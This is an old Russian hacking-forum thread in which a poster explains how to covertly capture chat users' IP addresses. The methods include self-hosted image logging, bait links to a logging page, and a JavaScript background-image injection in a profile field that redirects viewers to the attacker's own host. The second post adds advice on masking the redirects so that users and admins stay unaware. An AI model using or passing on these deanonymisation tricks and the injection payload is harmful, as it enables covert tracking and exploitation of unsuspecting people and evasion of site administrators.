Чаты Ip in chat

Discussion in 'Веб-уязвимости' started by Guest, 7 Nov 2003.

  1. Guest

    Guest Guest

    Reputations:
    0
    Как я могу узнать айпи в чате, если невозможно применение тегов?
     
  2. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    Что значит невозможно применение тегов? форма теги может не пропускать (вообще какой же это чат теги пропускает? это очень редкое явление и тогда они жестко фильтруюцца). Есть обходные пути: взлом через цвет, разрушение структуры, т.п. - почитай статьи.
    1) Если чат позволяет вставлять рисунки со своих ресурсов (т.е. без закачки, указываешь УРЛ картинки) - тогда проще. Идешь на свой ресурс и смотришь логи - там все расписано.
    2) Если рисунки вставлять нельзя и вообще ниче нельзя - тогда придется пойти на хитрость: пишеш в общак (или приват) сообщение типа "посотрите какой рульный сайт я нарыл!"+ссылочка (на свой ресурс). даю 90% что большая половина чатлат кто не спит ломануцца туда - иди и читай логи (сотри пункт первый). Либо если хостинг шаровый - и доступа к логам вэбсервера нету - тогда лепишь на странице счетчик (например из www.hotlog.ru) - и там сотриш. На народе счетчик доступен но айпишников ты не увидишь (только общая инфа сколько когда, т.п.).
    3) Некоторые чаты ломануть в лоб низзя. Но оказалось возможным на страничке анкеты заместо адруса своей странички вставить редирект типа "about:blank style=background-image:url(javascript:navigate('http://www.fuckbitch.ru&#39[​IMG])" (вместо факбич свой адрес). И затем начинаешь рисовацца - рано или поздно ктонить заинтересуецца твоей персональной информуцией - тогда он попал[​IMG]
     
  3. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    Ах да, чуть не забыл - редиректы желательно маскировать. А ссылку на свою страничку которую в общак кидаешь - страничка не должна вызывать у юзера подозрений: например зачитать тихо инфу и направить юзверя туда где действительно кульный сайт. В результате юзверь и админы ничего не подозревают до самого последнего момента - а тогда уже поздно[​IMG]